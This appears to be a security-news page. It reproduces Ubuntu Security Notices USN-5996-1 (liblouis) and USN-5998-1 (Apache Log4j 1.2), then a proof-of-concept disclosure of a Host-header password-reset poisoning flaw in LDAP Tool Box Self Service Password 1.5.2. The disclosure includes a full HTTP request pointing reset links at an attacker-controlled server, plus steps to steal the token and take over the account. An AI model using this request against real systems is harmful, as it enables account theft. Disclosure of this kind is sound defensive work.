    =========================================================================Ubuntu Security Notice USN-5996-1April 04, 2023liblouis vulnerabilities=========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.10- Ubuntu 22.04 LTS- Ubuntu 20.04 LTS- Ubuntu 18.04 LTS- Ubuntu 16.04 ESMSummary:Several security issues were fixed in liblouis.Software Description:- liblouis: Braille translation library - utilitiesDetails:It was discovered that Liblouis incorrectly handled certain files.An attacker could possibly use this issue to cause a denial of service.(CVE-2023-26767, CVE-2023-26768, CVE-2023-26769)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.10:  liblouis-bin                    3.22.0-2ubuntu0.1  liblouis20                      3.22.0-2ubuntu0.1Ubuntu 22.04 LTS:  liblouis-bin                    3.20.0-2ubuntu0.2  liblouis20                      3.20.0-2ubuntu0.2Ubuntu 20.04 LTS:  liblouis-bin                    3.12.0-3ubuntu0.2  liblouis20                      3.12.0-3ubuntu0.2Ubuntu 18.04 LTS:  liblouis-bin                    3.5.0-1ubuntu0.5  python-louis                    3.5.0-1ubuntu0.5Ubuntu 16.04 ESM:  liblouis-bin                    2.6.4-2ubuntu0.4+esm1  liblouis9                       2.6.4-2ubuntu0.4+esm1In general, a standard system update will make all the necessary changes.References:  https://ubuntu.com/security/notices/USN-5996-1  CVE-2023-26767, CVE-2023-26768, CVE-2023-26769Package Information:  https://launchpad.net/ubuntu/+source/liblouis/3.22.0-2ubuntu0.1  https://launchpad.net/ubuntu/+source/liblouis/3.20.0-2ubuntu0.2  https://launchpad.net/ubuntu/+source/liblouis/3.12.0-3ubuntu0.2  https://launchpad.net/ubuntu/+source/liblouis/3.5.0-1ubuntu0.5

Ubuntu Security Notice USN-5996-1

Ubuntu Security Notice 5998-1 - It was discovered that the SocketServer component of Apache Log4j 1.2 incorrectly handled deserialization. An attacker could possibly use this issue to execute arbitrary code. This issue only affected Ubuntu 16.04 ESM. It was discovered that the JMSSink component of Apache Log4j 1.2 incorrectly handled deserialization. An attacker could possibly use this issue to execute arbitrary code.

=========================================================================  
Ubuntu Security Notice USN-5998-1  
April 05, 2023

apache-log4j1.2 vulnerabilities  
=========================================================================  
A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS  
- Ubuntu 16.04 ESM

Summary:

Several security issues were fixed in Apache Log4j.

Software Description:  
- apache-log4j1.2: Java-based open-source logging tool

Details:

It was discovered that the SocketServer component of Apache Log4j 1.2  
incorrectly handled deserialization. An attacker could possibly use this issue  
to execute arbitrary code. This issue only affected Ubuntu 16.04 ESM.  
(CVE-2019-17571)

It was discovered that the JMSSink component of Apache Log4j 1.2 incorrectly  
handled deserialization. An attacker could possibly use this issue to execute  
arbitrary code. (CVE-2022-23302)

It was discovered that Apache Log4j 1.2 incorrectly handled certain SQL  
statements. A remote attacker could possibly use this issue to perform an SQL  
injection attack and alter the database. This issue was only fixed in Ubuntu  
18.04 LTS and Ubuntu 20.04 LTS. (CVE-2022-23305)

It was discovered that the Chainsaw component of Apache Log4j 1.2 incorrectly  
handled deserialization. An attacker could possibly use this issue to execute  
arbitrary code. This issue was only fixed in Ubuntu 18.04 LTS and Ubuntu 20.04  
LTS. (CVE-2022-23307)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 20.04 LTS:  
  liblog4j1.2-java                1.2.17-9ubuntu0.2

Ubuntu 18.04 LTS:  
  liblog4j1.2-java                1.2.17-8+deb10u1ubuntu0.2

Ubuntu 16.04 ESM:  
  liblog4j1.2-java                1.2.17-7ubuntu1+esm1

In general, a standard system update will make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-5998-1  
  CVE-2019-17571, CVE-2022-23302, CVE-2022-23305, CVE-2022-23307

Package Information:  
  https://launchpad.net/ubuntu/+source/apache-log4j1.2/1.2.17-9ubuntu0.2  
  https://launchpad.net/ubuntu/+source/apache-log4j1.2/1.2.17-8+deb10u1ubuntu0.2

Ubuntu Security Notice USN-5998-1

LDAP Tool Box Self Service Password version 1.5.2 suffers from an account takeover vulnerability.

    # Exploit Title:  LDAP Tool Box Self Service Password v1.5.2 -  Account takeover# Date: 02/17/2023# Exploit Author: Tahar BENNACEF (aka tar.gz)# Software Link: https://github.com/ltb-project/self-service-password# Version: 1.5.2# Tested on: UbuntuSelf Service Password is a PHP application that allows users to changetheir password in an LDAP directory.It is very useful to get back an account with waiting an action from anadministration especially in Active Directory environmentThe password reset feature is prone to an HTTP Host header vulnerabilityallowing an attacker to tamper the password-reset mail sent to his victimallowing him to potentially steal his victim's valid reset token. Theattacker can then use it to perform account takeover*Step to reproduce*1. Request a password reset request targeting your victim and setting inthe request HTTP Host header the value of a server under your controlPOST /?action=sendtoken HTTP/1.1Host: *111.111.111.111*User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101Firefox/102.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 16Origin: https://portal-lab.ngp.infraReferer: https://portal-lab.ngp.infra/?action=sendtokenUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1Te: trailersConnection: closelogin=test.resetAs the vulnerable web application's relying on the Host header of thepassword-reset request to craft the password-reset mail. The victimreceive a mail with a tampered link[image: image.png]2. Start a webserver and wait for the victim to click on the linkIf the victim click on this tampered link, he will sent his password resettoken to the server set in the password-reset request's HTTP Host header[image: image.png]3. Use the stolen token to reset victim's account passwordBest regards

Tag

#ubuntu